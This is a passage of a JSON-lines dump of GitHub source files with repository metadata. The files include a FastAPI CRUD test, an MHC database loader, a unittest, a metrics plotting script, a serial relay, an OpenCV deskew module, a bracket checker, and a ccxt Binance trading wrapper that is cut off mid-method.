client.post(\"/products/create\", json={'name': 'testTestTest'})\n response = client.get(\"/products/all\")\n end = response.json()\n assert len(end) > len(start)\n target = [i['id'] for i in end if i['name'] == 'testTestTest']\n for t in target:\n client.delete(f\"/products/delete/{t}\")\n\n\ndef test_patch():\n '''create, patch, delete'''\n client.post(\"/products/create\",\n json={'name': 'testPatchtestPatchtestPatch'})\n start = client.get(\"/products/all\").json()\n target_ids = [i['id']\n for i in start if i['name'] == 'testPatchtestPatchtestPatch']\n resp = client.patch(\n f\"/products/edit/{target_ids[0]}\", json={\"idPhoto\": 1234})\n end = client.get(\"/products/all\").json()\n assert [i['idPhoto'] for i in end if i['id'] == target_ids[0]][0] == 1234\n for t in target_ids:\n client.delete(f\"/products/delete/{t}\")\n\n\ndef test_invalid_patch():\n '''create, patch, delete'''\n client.post(\"/products/create\",\n json={'name': 'testPatchtestPatchtestPatch'})\n start = client.get(\"/products/all\").json()\n target_ids = [i['id']\n for i in start if i['name'] == 'testPatchtestPatchtestPatch']\n resp = client.patch(\n f\"/products/edit/{target_ids[0]}\", json={\"id_____Photo\": 1234})\n print(resp, resp.text)\n end = client.get(\"/products/all\").json()\n for t in target_ids:\n client.delete(f\"/products/delete/{t}\")\n","repo_name":"ressiwage/TESTTASK-fastapi-crud","sub_path":"server/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"14202398215","text":"from .libio import MIO\nimport csv \n\nclass MHCIDBData(MIO):\n \"\"\" existing data path and file names \n \"\"\"\n def __init__(self, args):\n self.args = args\n self.UPDATE = args.UPDATE\n self.data_dir = args.data_dir\n self.mhcI_db_dir = \"MHCIDB\"\n self.setMHCIDBPath(mhcidb_dirname=self.mhcI_db_dir, data_dir=self.data_dir)\n \n \n def __setMHCI_DB_Path(self, mhcidb_dirname):\n \"\"\" set MHCI Database directory path \"\"\"\n if not hasattr(self, \"mhcIdb_path\") or self.mhcIdb_path is None:\n cwd = self.getCWD() \n pre_dir, after = cwd.split(mhcidb_dirname)\n self.mhcIdb_path = self.joinPath(pre_dir,mhcidb_dirname )\n print((\"# MHCIDB workding path: {}\".format(self.mhcIdb_path)))\n \n \n def setMHCIDBPath(self, mhcidb_dirname=\"MHCIDB\", data_dir=\"existing_data\"):\n \"\"\" set MHCIDB working directory path and there existing data \"\"\"\n self.__setMHCI_DB_Path(mhcidb_dirname)\n self.mhcIdb_existing_data_path = self.joinPath(self.mhcIdb_path, data_dir)\n self.mhcIdb_hla_path = self.joinPath(self.mhcIdb_existing_data_path, \"hla\" )\n self.mhcIdb_pdb_path = self.joinPath(self.mhcIdb_existing_data_path, \"pdb\" )\n self.mhcIdb_ba_path = self.joinPath(self.mhcIdb_existing_data_path, \"ba\" ) \n self.mhcIdb_pdb3d_path = self.joinPath(self.mhcIdb_pdb_path, \"raw_pdbs\")\n \n \n def get_hla_aligned_seq_fp(self):\n \"\"\" return the path of the file contains the alinged protein seqeuences of \n HLA gene A, B and C\n \"\"\"\n fn_aln = \"ClassI_prot.txt\"\n return self.joinPath(self.mhcIdb_hla_path, fn_aln) \n \n def getAnchorMajorSeqFp(self):\n fn = \"HLA_amseq.bin\"\n return self.joinPath(self.mhcIdb_hla_path, fn)\n \n \n def getHLAAlleleGrpFp(self):\n fn = \"hla_allele_grps.bin\"\n return self.joinPath(self.mhcIdb_hla_path, fn)\n \n \n def getDLFastaFp(self, fn=\"fasta.txt\"):\n return self.joinPath(self.mhcIdb_pdb_path, fn)\n \n \n def pdbid2Fp(self, pdbid):\n return self.joinPath(self.mhcIdb_pdb3d_path, \"{}.pdb\".format(pdbid.lower()))\n \n \n def getSeqFilteredFpBin(self):\n fn_out_pre = \"mhcI_filter_by_seq\" \n fn_out_pre = self.joinPath(self.mhcIdb_pdb_path,fn_out_pre)\n fp_out_bin = \"%s.bin\" % fn_out_pre\n return fp_out_bin\n \n def getMHCIPDBFpBin(self):\n \"\"\" return existing pdbids' filename and path \"\"\"\n fn = \"mhcI_pdbs.bin\"\n return self.joinPath(self.mhcIdb_pdb_path, fn)\n \n def getPDB2ALLeleFpBin(self):\n fn = \"mhcI_pdb_to_allele.bin\"\n return self.joinPath(self.mhcIdb_path, fn)\n \n def getIEDBFp(self):\n fn_bind_data = 'bdata.20130222.mhci.txt'\n return self.joinPath(self.mhcIdb_ba_path, fn_bind_data)\n \n def getBindDataFp(self):\n fn_bind_bin = \"mhcI_bdata.bin\"\n return self.joinPath(self.mhcIdb_ba_path, fn_bind_bin)\n \n def loadMHCIBindData(self):\n fp_bind_data = self.getBindDataFp()\n if not self.isNew(fp_bind_data):\n self.mhcI_bind_data = self.loadObj(fp_bind_data)\n else:\n self.readBindData(self.getIEDBFp())\n self.dumpObj(self.mhcI_bind_data, fp_bind_data)\n \n \n def readBindData(self, fp):\n txt = self.readTxtFile(fp)\n self.mhcI_bind_data = {}\n cnt = 0\n for ln in txt[1:]:\n ln = ln.strip()\n elems = ln.split()\n if not ln: continue\n if len(elems) != 6:\n print(\"# Error in parsing: %s\" % ln) \n else:\n allele_name = elems[1]\n if allele_name.startswith(\"HLA-\"):\n cnt += 1\n lig_len = elems[2]\n lig = elems[3]\n inq = elems[4]\n bd = elems[5]\n if allele_name in self.mhcI_bind_data:\n self.mhcI_bind_data[allele_name].append((lig_len, lig, inq, bd))\n else:\n self.mhcI_bind_data[allele_name]= [(lig_len, lig, inq, bd)]\n ln = \"# num HLA binding data: %s\" % cnt\n self.add2log(ln, vb=1) \n \n \n def loadMHCIPDB2AlleleData(self):\n fp_bin = self.getPDB2ALLeleFpBin()\n self.matched_pdbs, self.non_matched_pdbs = self.loadObj(fp_bin)\n \n \n\n def loadMHCIPDBInf(self):\n \"\"\" mhci_pdbs[pdbid] = [(chain_ids, chain_seq(xxx,...), [ligand chains]), ...] \"\"\"\n fp = self.getMHCIPDBFpBin()\n self.mhcI_pdbs = self.loadObj(fp)\n self.mhcI_pdbids = self.mhcI_pdbs.keys() \n \n def getMHCILigandFpBin(self):\n fn = \"mhcI_pdb_ligand.bin\"\n fp = self.joinPath(self.mhcIdb_pdb_path, fn)\n return fp \n \n \n def saveMPBDB2CSV(self, mpbdb, fn=\"mpbdb.csv\"):\n \"\"\" lig_seq, lig_chain_id, lig_len \"\"\"\n with open(fn, 'w') as fh:\n writer = csv.writer(fh)\n pdbids = list(mpbdb.keys())\n pdbids.sort()\n heads = [\"PDBID\", \"Allele\", \"Ligand_len\", \"Ligand_seq\", \"Binding_operator\", \"Binding_affinity\"]\n writer.writerow(heads)\n for pdbid in pdbids:\n pdb_bds, cnt = mpbdb[pdbid]\n allele_name = pdb_bds[0][0]\n if cnt == 0:\n bd_opt, ba = \"\", \"\"\n lig_seq, lig_chain_id, lig_len = self.getLigandSeq(pdbid)\n if lig_seq is None:\n lig_seq = ''\n lig_len = ''\n else:\n lig_len = len(lig_seq) \n elif cnt > 1:\n print(\"#Error: muliple binding affinities for pdb: {} -> {}\".format(pdbid, pdb_bds))\n else:\n #print(pdb_bds[0][1])\n lig_len, lig_seq, bd_opt, ba = pdb_bds[0][1][0]\n row = [pdbid, allele_name, lig_len, lig_seq, bd_opt, ba] \n writer.writerow(row)\n print(\"# Saving Mpdbdb into: {}\".format(fn))\n \n \n def loadMHCIPDBLigandSeq(self):\n fp_bin = self.getMHCILigandFpBin()\n if self.isNew(fp_bin):\n fp_fasta = self.getDLFastaFp()\n self.readPdbSeqs(fp_fasta)\n #print( self.pdb_seqs)\n self.mhcI_pdb_ligands_seqs = {}\n for pdbid in self.mhcI_pdbids:\n ligand_inf = self.mhcI_pdbs[pdbid][-1]\n if ligand_inf:\n ligand_chain_id = ligand_inf[0][0]\n ligand_length = ligand_inf[0][1]\n self.mhcI_pdb_ligands_seqs[pdbid] = self.pdb_seqs[pdbid][ligand_chain_id], ligand_chain_id, ligand_length\n self.dumpObj(self.mhcI_pdb_ligands_seqs, fp_bin, vb=1)\n else:\n self.mhcI_pdb_ligands_seqs = self.loadObj(fp_bin) \n \n ","repo_name":"jinbuw/mpbdb","sub_path":"src/lib/libmhcidb.py","file_name":"libmhcidb.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"26782793768","text":"# pylint: disable=missing-docstring, protected-access\n\nimport os\nimport unittest\nimport tempfile\nimport warnings\n\nimport iCount\n\n\nclass TestExamplesScriptsInstall(unittest.TestCase):\n\n def setUp(self):\n self.tempdir = tempfile.mkdtemp()\n self.examples_dir = os.path.join(self.tempdir, 'examples')\n warnings.simplefilter(\"ignore\", ResourceWarning)\n\n def test_examples(self):\n iCount.examples.run(out_dir=self.tempdir)\n # check if two scripts are present in subfolder examples\n self.assertTrue(\n os.path.isfile(os.path.join(self.examples_dir, 'hnRNPC.sh'))\n )\n self.assertTrue(\n os.path.isfile(os.path.join(self.examples_dir, 'hnRNPC_reduced.sh'))\n )\n\n def tearDown(self):\n files = os.listdir(self.examples_dir)\n for fn in files:\n os.remove(os.path.join(self.examples_dir, fn))\n\n os.rmdir(self.examples_dir)\n os.rmdir(self.tempdir)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"tomazc/iCount","sub_path":"iCount/tests/test_examples.py","file_name":"test_examples.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"94"} +{"seq_id":"32278533839","text":"#!/anaconda3/bin/python3.7\n# -*- coding: UTF-8 -*-\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\ndef get_results_by_folds(nbr_folds, df):\n list_finale_metrics_dev = list()\n list_text_added = list()\n list_all_metrics_test = list()\n for fold in range(nbr_folds):\n df_fold = df.loc[df['fold'] == fold]\n list_finale_metrics_dev.append(np.array(df_fold.iloc[-1:,-2:].values.tolist()[0]))\n list_all_metrics_test.append(df_fold.iloc[:,-2:].values.tolist())\n return np.array(list_finale_metrics_dev), np.array(list_text_added), np.array(list_all_metrics_test)\n\ndef get_finale_results(nbr_folds, df):\n metrics, text_added, all_metrics_test = get_results_by_folds(nbr_folds, df)\n evolution_text_added = np.sum(text_added, axis=0)/nbr_folds\n evolution_metrics_test = np.sum(all_metrics_test, axis=0)/nbr_folds\n finale_metrics_dev = np.sum(metrics, axis=0)/nbr_folds\n\n mse_evolution = evolution_metrics_test[:,0]\n mae_evolution = evolution_metrics_test[:,1]\n accuracy = evolution_metrics_test[:,2]\n mse_finale = finale_metrics_dev[0]\n mae_finale = finale_metrics_dev[1]\n\n return evolution_text_added, mse_evolution, mae_evolution, mse_finale, mae_finale, accuracy\n\nif __name__ == \"__main__\":\n\n df = pd.read_csv(\"../projetAA/semi_supervised_multilabels-expertFeatures_epoch-30_seuil-0-6_iter-8.csv\", sep=\"\\t\", index_col=0)\n\n evolution_text_added, mse_evolution, mae_evolution, mse_finale, mae_finale, accuracy = get_finale_results(5, df)\n\n title = \"Variation des performances durant les itérations\"\n fig = plt.figure()\n plt.title(title)\n x = [el for el in range(len(mae_evolution))]\n plt.xlabel(\"itérations\")\n plt.ylabel(\"mesure\")\n\n plt.plot(x, mse_evolution, color=\"green\", label='MSE')\n plt.plot(x, mae_evolution, color=\"orange\", label='MAE')\n plt.plot(x, accuracy, color=\"blue\", label='Accuracy')\n\n plt.legend(loc='upper left')\n plt.savefig('../{}.png'.format(title.replace(\"\\n\", \"\").replace(\" : \",\"_\").replace(\" \", \"_\").replace(\",\", \"-\").strip()), dpi=300, format='png', bbox_inches='tight')","repo_name":"xingyuliuNLP/tweet_register","sub_path":"5_performance_evolution.py","file_name":"5_performance_evolution.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"72246056630","text":"import time\nimport serial\n \nser = serial.Serial( \n port='/dev/serial0',\n baudrate = 115200,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1\n)\n\nwhile True:\n x = input()\n ser.write(x.encode())","repo_name":"jstkyle/Senior-Design","sub_path":"Raspi_Software/kb_control.py","file_name":"kb_control.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"4309081169","text":"from __future__ import annotations\nfrom dataclasses import dataclass\nfrom typing import List\nfrom sys import intern\nimport cv2\nimport numpy as np\nimport math\nfrom typing import List, Tuple\nfrom imageutil import *\n\nIMG_FILE = 'contract_house.png'\nMAX_PIXEL = 3508\nMAX_WIDTH = 2480\nMAX_HEIGHT = MAX_PIXEL\n\ndef convertColor(img):\n tmp = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n tmp = cv2.threshold(tmp, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\n return tmp\n\ndef resizeImage(img):\n height, width = img.shape\n # print(\"height: {}, width : {}\".format(height, width))\n sampling_method = cv2.INTER_LINEAR\n if height * width > MAX_WIDTH * MAX_HEIGHT :\n # This image needs downsampling\n sampling_method = cv2.INTER_LENEAR\n else :\n sampling_method = cv2.INTER_AREA\n \n if width > height :\n newheight = int(height * MAX_WIDTH / width)\n # print(\"new h : {}, w : {}\".format(newheight, MAX_WIDTH))\n tmp = cv2.resize(img, (MAX_WIDTH, newheight), interpolation=sampling_method)\n else :\n newwidth = int(width * MAX_HEIGHT / height)\n # print(\"new h : {}, w : {}\".format(newwidth, MAX_HEIGHT))\n tmp = cv2.resize(img, (newwidth, MAX_HEIGHT), interpolation=sampling_method)\n return tmp\n\ndef filteredAngle(angles):\n npangles = np.array(angles)\n mean = np.mean(npangles)\n std = np.std(npangles)\n dfm = abs(npangles-mean)\n max_deviation = 2\n not_outliers = dfm < max_deviation * std\n std_angles = npangles[not_outliers]\n if(len(std_angles) > 0):\n return np.median(std_angles)\n else:\n return 0\n\ndef getSkewnessFromVlines(img, vlines):\n angles = []\n # print('vlines:{}'.format(vlines))\n for line in vlines:\n for x1,y1,x2,y2 in line:\n if abs(y2-y1) == 0:\n angles.append(0)\n continue\n if abs(x2-x1) == 0:\n angles.append(0)\n continue\n yd = y1 - y2\n xd = x2 - x1\n if xd == 0:\n continue\n angle = math.degrees(math.atan(yd/xd))\n angle = 90 - angle\n # print(angle)\n if abs(angle) > 4:\n continue\n angles.append(angle)\n # print('v angles:{}'.format(angles))\n return filteredAngle(angles)\n\ndef getSkewnessFromLines(img, lines):\n angles = []\n threshold_pixel = 12\n h_milestonpoints = []\n hlines = {}\n for line in lines:\n for x1,y1,x2,y2 in line:\n if abs(y2-y1) == 0 :\n angles.append(0)\n continue\n if abs(x2-x1) == 0 :\n angles.append(0)\n continue\n yd = y2-y1\n xd = x2-x1\n angle = math.atan(yd/xd)*180/math.pi\n if angle > 4 :\n continue\n if angle < -4 :\n continue\n angles.append(angle)\n if (abs(h_milestonpoints - y1) < threshold_pixel).sum() == 0:\n h_milestonpoints.append(y1)\n newlist = []\n newlist.append((x1,y1,x2,y2))\n hlines[y1] = newlist\n else:\n idx = [i for i,v in enumerate(abs(h_milestonpoints - y1) < threshold_pixel) if v > 0][0]\n targetlist = hlines[h_milestonpoints[idx]]\n targetlist.append((x1,y1,x2,y2))\n\n # print('angles:{}'.format(angles))\n\n ## Calculate median value from the longest hline\n anglesfromlline = []\n # print('horizontal lines for skewness detecting: {}'.format(hlines))\n for linepaths in hlines.values():\n linepaths.sort(key=lambda line:line[0])\n x1 = linepaths[0][0] # x1\n y1 = linepaths[0][1]\n linepaths.sort(key=lambda line:line[2])\n x2 = linepaths[-1][2]\n y2 = linepaths[-1][3]\n yd = y2-y1\n xd = x2-x1\n angle = math.atan(yd/xd)*180/math.pi\n anglesfromlline.append(angle)\n # print(anglesfromlline)\n\n ## Calculate via HoughLine\n sorted(h_milestonpoints)\n h_milestonpoints = np.sort(h_milestonpoints)\n heights = np.diff(h_milestonpoints)\n angleFromHoughLine = None\n if(len(heights)>0):\n average_span_height = np.median(heights)\n # print('avg height:{}'.format(average_span_height))\n threshold = 10\n std_line_index = int(np.argmin(abs(heights - average_span_height) < threshold, axis=0))\n std_line_ypoint = h_milestonpoints[std_line_index]\n largest_element = hlines[std_line_ypoint]\n \n # print('largest elements:{}'.format(largest_element))\n x_values = np.array([])\n x_values = np.append(x_values,sorted(set([item[0] for item in largest_element])))\n x_values = np.append(x_values,sorted(set([item[2] for item in largest_element])))\n y_values = np.array([])\n y_values = np.append(y_values,sorted(set([item[1] for item in largest_element])))\n y_values = np.append(y_values,sorted(set([item[3] for item in largest_element])))\n sorted(x_values)\n sorted(y_values)\n # print(x_values)\n # print(y_values)\n x1 = int(x_values[0])\n x2 = int(x_values[-1])\n y1 = int(y_values[0])\n y2 = int(y_values[-1])\n if x1 > x2 :\n x1,x2 = x2,x1\n if y1 > y2 :\n y1,y2 = y2,y1\n # print('largest elements ROI: {},{},{},{}'.format(x1,x2,y1,y2)) \n roi = img[y1:y2, x1:x2]\n debugShow('lineroi', roi)\n\n anglefromhline = []\n houghlines = cv2.HoughLines(roi,1,np.pi/180 / 10,int(abs(x2-x1)*9/10))\n if houghlines is not None :\n for oneline in houghlines:\n rho, theta = oneline[0]\n degree = math.degrees(theta)\n # print('rho, theta, skewness: {}, {}'.format(rho, degree, 90-degree))\n angleFromHoughLine = (90-degree) * -1\n anglefromhline.append(angleFromHoughLine)\n angleFromHoughLine = filteredAngle(anglefromhline)\n\n angleFromShortPaths = filteredAngle(angles)\n angleFromLongestPaths = filteredAngle(anglesfromlline)\n if angleFromHoughLine is None:\n angleFromHoughLine = 0.0\n\n # print('s.angle, l.angle, h.angle: {}, {}, {}'.format(angleFromShortPaths, angleFromLongestPaths, angleFromHoughLine))\n\n if abs(angleFromLongestPaths) > abs(angleFromShortPaths):\n if abs(angleFromHoughLine) < abs(angleFromLongestPaths):\n return angleFromHoughLine\n else:\n return angleFromLongestPaths\n else:\n return angleFromShortPaths\n\ndef get_median_angle(binary_image):\n # applying morphological transformations on the binarised image\n # to eliminate maximum noise and obtain text ares only\n # boxes = getLineDetection(binary_image)\n erode_otsu = cv2.erode(binary_image,np.ones((7,7),np.uint8),iterations=1)\n negated_erode = ~erode_otsu\n debugShow('erode_otsu', negated_erode)\n opening = cv2.morphologyEx(negated_erode,cv2.MORPH_OPEN,np.ones((5,5),np.uint8),iterations=2)\n debugShow('opening', opening)\n double_opening = cv2.morphologyEx(opening,cv2.MORPH_OPEN,np.ones((3,3),np.uint8),iterations=5)\n debugShow('double_opening', double_opening)\n double_opening_dilated_3x3 = cv2.dilate(double_opening,np.ones((3,3),np.uint8),iterations=4)\n debugShow('dilated_3x3', double_opening_dilated_3x3)\n # finding the contours in the morphologically transformed image\n contours_otsu,_ = cv2.findContours(double_opening_dilated_3x3,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n # debugShowContours('contours', double_opening_dilated_3x3, contours_otsu)\n # iniatialising the empty angles list to collet the angles of each contour\n angles = []\n\n # obtaining the angles of each contour using a for loop\n for cnt in range(len(contours_otsu)):\n # the last output of the cv2.minAreaRect() is the orientation of the contour\n rect = cv2.minAreaRect(contours_otsu[cnt])\n\n # appending the angle to the angles-list\n angles.append(rect[-1])\n \n # finding the median of the collected angles\n angles.sort()\n median_angle = np.median(angles)\n\n # returning the median angle\n return median_angle\n\n# funtion to correct the median-angle to give it to the cv2.warpaffine() function\ndef corrected_angle(angle):\n if 0 <= angle <= 90:\n corrected_angle = angle - 90\n elif -45 <= angle < 0:\n corrected_angle = angle - 90\n elif -90 <= angle < -45:\n corrected_angle = 90 + angle\n return corrected_angle\n\ndef rotate(img, angle):\n (h, w) = img.shape[:2]\n center = (w // 2, h // 2)\n # print('center and radian:{}, {}', center, math.radians(angle))\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\n rotated = cv2.warpAffine(img, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\n return rotated\n\n# https://github.com/TarunChakitha/OCR/blob/master/OCR.py\n# https://stackoverflow.com/questions/45322630/how-to-detect-lines-in-opencv\ndef getLines(img, low_threshold, min_line_length, line_gap, granulity):\n rho = 1 # distance resolution in pixels of the Hough grid\n theta = np.pi / 180 / granulity # angular resolution in radians of the Hough grid\n lines = cv2.HoughLinesP(img, rho, theta, low_threshold, np.array([]), min_line_length, line_gap)\n return lines\n\ndef filterHVLines(lines, standard_degree):\n hlines = []\n for line in lines:\n for x1, y1, x2, y2 in line:\n degree = math.degrees(math.atan2(y1-y2, x2-x1))\n degree = degree - standard_degree\n if abs(degree) < 5:\n hlines.append(line)\n return hlines\n\ndef getHLines(img, low_threshold, min_line_length, line_gap, granulity):\n lines = getLines(img, low_threshold, min_line_length, line_gap, granulity)\n return filterHVLines(lines, 0)\n\ndef getVLines(img, low_threshold, min_line_length, line_gap, granulity):\n lines = getLines(img, low_threshold, min_line_length, line_gap, granulity)\n return filterHVLines(lines, 90)\n\ndef getAverageAngles(standard_degree, lines):\n filtered = []\n filteredlines = []\n for line in lines:\n for x1,y1,x2,y2 in line:\n degree = math.degrees(math.atan2(y1-y2, x2-x1))\n degree = degree - standard_degree\n if abs(degree) < 5:\n filtered.append(degree)\n filteredlines.append(line)\n return filteredAngle(filtered), filteredlines\n\ndef drawLines(img, lines):\n imgcopy = np.copy(img) * 0\n for line in lines:\n for x1,y1,x2,y2 in line:\n cv2.line(imgcopy,(x1,y1),(x2,y2),(255,255,255),2)\n # debugShow('drawlines', imgcopy)\n return imgcopy\n\ndef deskew(img):\n debug = False\n low_threshold = 30\n line_length_unit = int(img.shape[1] / 10)\n angle = 0\n filteredlines = []\n for multiple in reversed(range(9)):\n min_line_length = multiple * line_length_unit\n line_gap = 10\n hlines = getHLines(img, low_threshold, min_line_length,line_gap, 5)\n # print('max line, # of lines:{},{}'.format(min_line_length, len(hlines)))\n if len(hlines) > 3:\n hlines = getHLines(img, low_threshold, min_line_length, line_gap, 10)\n angle, filteredlines = getAverageAngles(0, hlines)\n if len(filteredlines) > 3:\n break\n # print(angle)\n debugShow('lines', drawLines(img, filteredlines), debug)\n angle = angle * -1\n rotatedimg = rotate(img, angle)\n return rotatedimg, angle\n\ndef deskewFromVline(img):\n low_threshold = 30\n line_length_unit = int(img.shape[0] / 10)\n angle = 0\n filteredlines = []\n for multiple in reversed(range(9)):\n min_line_length = multiple * line_length_unit\n line_gap = 10\n vlines = getVLines(img, low_threshold, min_line_length,line_gap, 5)\n # print('max line, # of lines:{},{}'.format(min_line_length, len(vlines)))\n if len(vlines) > 3:\n vlines = getVLines(img, low_threshold, min_line_length, line_gap, 10)\n angle, filteredlines = getAverageAngles(90, vlines)\n if len(filteredlines) > 3:\n break\n # print(angle)\n debugShow('lines', drawLines(img, filteredlines))\n angle = angle * -1\n rotatedimg = rotate(img, angle)\n return rotatedimg\n\ndef rotatePoint(point, center, angrad:float):\n point = (point[0] - center[0], point[1] - center[1])\n x = math.cos(angrad) * point[0] - math.sin(angrad) * point[1]\n y = math.sin(angrad) * point[0] + math.cos(angrad) * point[1]\n point = (int(x + center[0]), int(y + center[1]))\n return point\n\ndef recoverOriginalPoint(orgsize, resized, skewnessRad: float, topleft, bottomright) -> List[tuple(int, int)]:\n resizedratio = orgsize[0] / resized[0]\n resizedx1 = topleft[0] * resizedratio\n resizedx2 = bottomright[0] * resizedratio\n resizedy1 = topleft[1] * resizedratio\n resizedy2 = bottomright[1] * resizedratio\n center = (orgsize[0] // 2, orgsize[1] // 2)\n point1 = (resizedx1, resizedy1)\n point2 = (resizedx1, resizedy2)\n point3 = (resizedx2, resizedy2)\n point4 = (resizedx2, resizedy1)\n reverseang = skewnessRad\n orgpoint1 = rotatePoint(point1, center, reverseang)\n orgpoint2 = rotatePoint(point2, center, reverseang)\n orgpoint3 = rotatePoint(point3, center, reverseang)\n orgpoint4 = rotatePoint(point4, center, reverseang)\n rtn = [orgpoint1, orgpoint2, orgpoint3, orgpoint4]\n return rtn\n\nif __name__ == '__main__':\n\n img = cv2.imread(IMG_FILE)\n\n # 0. Converting color to grey & binarization\n thresh_inv = convertColor(img)\n # 1. Resizing - Upsampling or Downsampling\n resized = resizeImage(thresh_inv)\n # debugShow('resizeImage', resized)\n # 2. deskew\n deskewed = deskew(resized)\n debugShow('deskewed', deskewed)\n deskewed = deskewFromVline(deskewed)\n debugShow('deskewed', deskewed)\n","repo_name":"kpyopark/pytesseract_tableform_text","sub_path":"deskew.py","file_name":"deskew.py","file_ext":"py","file_size_in_byte":13719,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"8264500286","text":"closing = [']', '}', ')']\nbracket_dict = {'[': ']', '{': '}', '(': ')'}\nfrom Stack import stack\n\n\ndef check_balance(string):\n string = list(string)\n br_stack = stack.Stack()\n for bracket in string:\n if bracket in closing:\n if br_stack.size() == 0 or bracket_dict[br_stack.pop()] != bracket:\n return 'Несбалансированно'\n else:\n br_stack.push(bracket)\n if br_stack.size() != 0:\n return 'Несбалансированно'\n return 'Cбалансированно'\n\n\nprint(check_balance('[]{({})}'))\n","repo_name":"krushmuk/stack","sub_path":"stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"72837407029","text":"from .pexchange import ccxt, ccxt_async, httpx\nfrom model import MarketOrder\n\n\nclass Binance:\n def __init__(self, key, secret):\n self.future = ccxt.binance({\n 'apiKey': key,\n 'secret': secret,\n 'enableRateLimit': True,\n 'options': {\n 'defaultType': 'future'\n }\n })\n self.future_async = ccxt_async.binance({\n 'apiKey': key,\n 'secret': secret,\n 'options': {\n 'defaultType': 'future'\n }\n })\n self.spot = ccxt.binance({\n 'apiKey': key,\n 'secret': secret,\n })\n self.spot_async = ccxt_async.binance({\n 'apiKey': key,\n 'secret': secret,\n })\n self.spot.load_markets()\n self.future.load_markets()\n self.order_info: MarketOrder = None\n\n def parse_quote(self, quote: str):\n if self.order_info is None:\n return quote.replace(\"PERP\", \"\")\n else:\n if self.order_info.is_futures:\n return quote.replace(\"PERP\", \"\")\n else:\n return quote\n\n def parse_symbol(self, base: str, quote: str):\n quote = self.parse_quote(quote)\n if self.order_info is None:\n return f\"{base}{quote}\"\n else:\n if self.order_info.is_futures:\n return f\"{base}/{quote}\"\n else:\n return f\"{base}/{quote}\"\n\n def parse_side(self, side: str):\n if side.startswith(\"entry/\") or side.startswith(\"close/\"):\n return side.split(\"/\")[-1]\n else:\n return side\n\n def get_amount(self, base, quote, amount, percent) -> float:\n if amount is not None and percent is not None:\n raise Exception(\"amount와 percent는 동시에 사용할 수 없습니다\")\n elif amount is not None:\n result = amount\n elif percent is not None:\n if self.order_info.side in (\"buy\", \"entry/buy\", \"entry/sell\"):\n cash = self.get_balance(quote) * percent/100\n current_price = self.fetch_price(base, quote)\n result = cash / current_price\n elif self.order_info.side in (\"sell\", \"close/buy\", \"close/sell\"):\n symbol = self.parse_symbol(base, quote)\n free_amount = self.get_futures_position(symbol) if self.order_info.is_crypto and self.order_info.is_futures else self.get_balance(base)\n result = free_amount * float(percent)/100\n else:\n raise Exception(\"amount와 percent 중 하나는 입력해야 합니다\")\n return result\n\n def market_order(self, base: str, quote: str, type: str, side: str, amount: float, price: float = None):\n symbol = self.parse_symbol(base, quote)\n side = self.parse_side(side)\n return self.spot.create_order(symbol, type.lower(), side.lower(), amount)\n\n async def market_order_async(self, base: str, quote: str, type: str, side: str, amount: float, price: float = None):\n symbol = self.parse_symbol(base, quote)\n side = self.parse_side(side)\n return await self.spot_async.create_order(symbol, type.lower(), side.lower(), amount)\n\n def market_buy(self, base: str, quote: str, type: str, side: str, amount: float, price: float = None, buy_percent: float = None):\n buy_amount = self.get_amount(base, quote, amount, buy_percent)\n return self.market_order(base, quote, type, side, buy_amount)\n\n async def market_buy_async(self, base: str, quote: str, type: str, side: str, amount: float, price: float = None, buy_percent: float = None):\n buy_amount = self.get_amount(base, quote, amount, buy_percent)\n return await self.market_order_async(base, quote, type, side, buy_amount)\n\n def market_sell(self, base: str, quote: str, type: str, side: str, amount: float, price: str = None, sell_percent: float = None):\n sell_amount = self.get_amount(base, quote, amount, sell_percent)\n return self.market_order(base, quote, type, side, sell_amount)\n\n async def market_sell_async(self, base: str, quote: str, type: str, side: str, amount: float, price: str = None, sell_percent: float = None):\n sell_amount = self.get_amount(base, quote, amount, sell_percent)\n return await self.market_order_async(base, quote, type, side, sell_amount)\n\n def is_hedge_mode(self):\n response = self.future.fapiPrivate_get_positionside_dual()\n if response['dualSidePosition']:\n return True\n else:\n return False \n\n def market_entry(self, base: str, quote: str, type: str, side: str, amount: float, price: str = None, entry_percent: float = None, leverage: int = None):\n symbol = self.parse_symbol(base, quote)\n side = self.parse_side(side)\n quote = self.parse_quote(quote)\n entry_amount = self.get_amount(base, quote, amount, entry_percent)\n if leverage is not None:\n self.set_leverage(leverage, symbol)\n try:\n return self.future.create_order(symbol, type.lower(), side, abs(entry_amount))\n except Exception as e:\n if \"position side does not match\" in str(e):\n if side == \"buy\":\n positionSide = \"LONG\"\n elif side == \"sell\":\n positionSide = \"SHORT\"\n return self.future.create_order(symbol, type.lower(), side, abs(entry_amount), params={'positionSide': positionSide})\n else:\n raise Exception(\"진입 실패\")\n\n \n\n def market_long_entry(self, base: str, quote: str, amount: float, price:str =None, entry_percent: float = None, leverage: int = None):\n return self.market_entry(base, quote, \"market\", \"entry/buy\", amount, price, entry_percent, leverage)\n \n def market_short_entry(self, base: str, quote: str, amount: float, 